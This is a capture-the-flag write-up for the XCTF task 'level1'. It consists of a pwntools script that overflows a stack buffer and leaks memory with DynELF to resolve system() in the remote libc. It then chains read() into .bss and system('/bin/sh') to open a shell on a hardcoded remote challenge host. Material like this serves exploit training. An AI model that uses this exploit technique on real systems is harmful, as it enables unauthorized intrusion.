xctf攻防世界_level1——本地和远程程序不一样

#-*-coding:utf-8 -*-
import pwn
from pwn import *
#pwn.context.log_level = 'debug'

#context(arch = 'i386', os = 'linux')
#shellcode = asm(shellcraft.sh())  # generate shellcode directly with shellcraft.sh()
#asm
#io = process('./level1')
# Connection to the challenge instance; the local binary and the remote one
# behave differently (see the commented-out recvuntil inside leak()).
io = remote('111.198.29.45', 52614)

# Addresses are taken from the local copy of the binary: the PLT call
# targets used by the ROP chains below, write's GOT slot, and the .bss base
# (writable scratch memory at runtime).
elf=ELF('./level1')

write_plt=elf.symbols['write']
write_got=elf.got['write']   # not referenced elsewhere on this page
read_plt=elf.symbols['read']
bss=elf.bss()
# Hard-coded, non-PIE addresses of this exact build; they hold only for the
# binary they were read from. `main` is not used by this script.
start=0x08048380
main=0x080484B7 
def leak(address):
	"""Read 4 bytes of the remote process's memory at `address`.

	The padding 'a'*(0x88+4) overruns the stack buffer up to the saved
	return address (the 0x88 offset is taken as given here, not derived on
	this page); the chain then calls write(1, address, 4) through its PLT
	stub and returns to `start` so the program re-enters its entry point
	and can be driven again on the next call. pwn.DynELF uses this as its
	memory-read primitive.

	Returns the raw 4 bytes received from the remote side.
	"""
	payload='a'*(0x88+4)+p32(write_plt)+p32(start)+p32(1)+p32(address)+p32(4)
	#io.recvuntil("?\n") # local and remote differ here -- note this! (the remote instance apparently does not print the prompt the local one does)
	io.send(payload)
	# NOTE(review): recv(4) may return fewer than 4 bytes; the u32() below assumes a full read.
	leaked=io.recv(4)
	print "[%s] -> [%s] = [%s]" % (hex(address),hex(u32(leaked)),repr(leaked))
	return leaked
# DynELF drives leak() repeatedly to resolve `system` in the remote libc
# without knowing which libc build is installed there. (ELF('./level1') is
# loaded a second time here although `elf` above is the same file.)
d=pwn.DynELF(leak,elf=ELF('./level1'))
system=d.lookup('system','libc')
print hex(system)
print
print hex(bss)
# Second stage: read(0, bss, 8) stores a string in .bss, then control goes
# to 0x08048549 -- presumably a gadget that discards read's three arguments
# before the next frame (TODO confirm against the binary) -- and from there
# to system(bss), with 0xdeadbeef as system's (never reached) return address.
payload2='a'*(0x88+4)+p32(read_plt)+p32(0x08048549)+p32(0)+p32(bss)+p32(8)

payload2+=p32(system)+p32(0xdeadbeef)+p32(bss)
raw_input()  # manual pause before the final payload is sent
io.sendline(payload2)

# The 8 bytes that the read() call above consumes: the string system() runs.
io.send('/bin/sh\x00')

io.interactive()

本来是个简单的题(程序给出了buf地址),但是远程程序不一样,直接变成了无libc的PWN。
